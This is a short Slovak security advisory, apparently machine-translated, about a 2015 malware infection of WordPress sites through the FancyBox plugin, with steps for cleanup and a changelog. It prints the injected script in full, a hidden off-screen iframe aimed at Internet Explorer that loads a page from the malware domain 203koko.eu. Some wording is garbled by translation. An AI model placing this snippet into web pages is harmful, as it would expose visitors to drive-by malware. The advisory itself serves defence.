Začiatkom týždňa sa séria stránok a blogov s WordPress, dostali upozornenia o malvérová infekcia cez Google Webmasters.
Problém, na ktorý Google Webmasters sa vzťahuje na prítomnosť a treska / skript malvér iframe na zdrojových webových stránkach.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>Zdá sa, že ide o a zraniteľnosť a doplnokobťažovanieFancyBox pre WordPress ktorý do včera (05.02.2015) nebol dlhší čas aktualizovaný.
Riešenie tohto problému a dezinfekcia vírusových miest s týmto malvérom je to pomerne jednoduché.
1. Zakážte doplnok FancyBox.
2. Odstráňte všetky súbory zásuvného modulu FancyBox zo servera (cez FTP)
3. Nainštalujte novú verziu doplnku (FancyBox 3.0.4)
FancyBox pre WordPress 3.0.4
– Premenované nastavenie ovplyvnené bezpečnostným problémom uvedeným v 3.0.3. To by malo zastaviť zobrazovanie škodlivého kódu na stránkach, kde je doplnok aktualizovaný bez odstránenia škodlivého kódu.
FancyBox pre WordPress 3.0.3
– Opravený bezpečnostný problém.
Informácie o malvéri:
TYPE: Presmerovanie iframe
CIEĽ: WordPress Fancybox
MALWARE DOMÉNA: 203koko.eu
URI MALWARE: http://203koko.eu/hjnfh/ipframe2.php
RAW KÓD MALWARE: <iframe src=”http://203koko.eu/hjnfh/ipframe2.php” šírka =”20″ výška =”30″ ></iframe>
SKRIPTY MALWARE: <skript>if (navigator.userAgent.match(/msie/i)) { document.write(‘ <div style=”position:absolute;left:-2000px;width:2000px”>
Odstráňte malvér zo svojho webu WordPress.
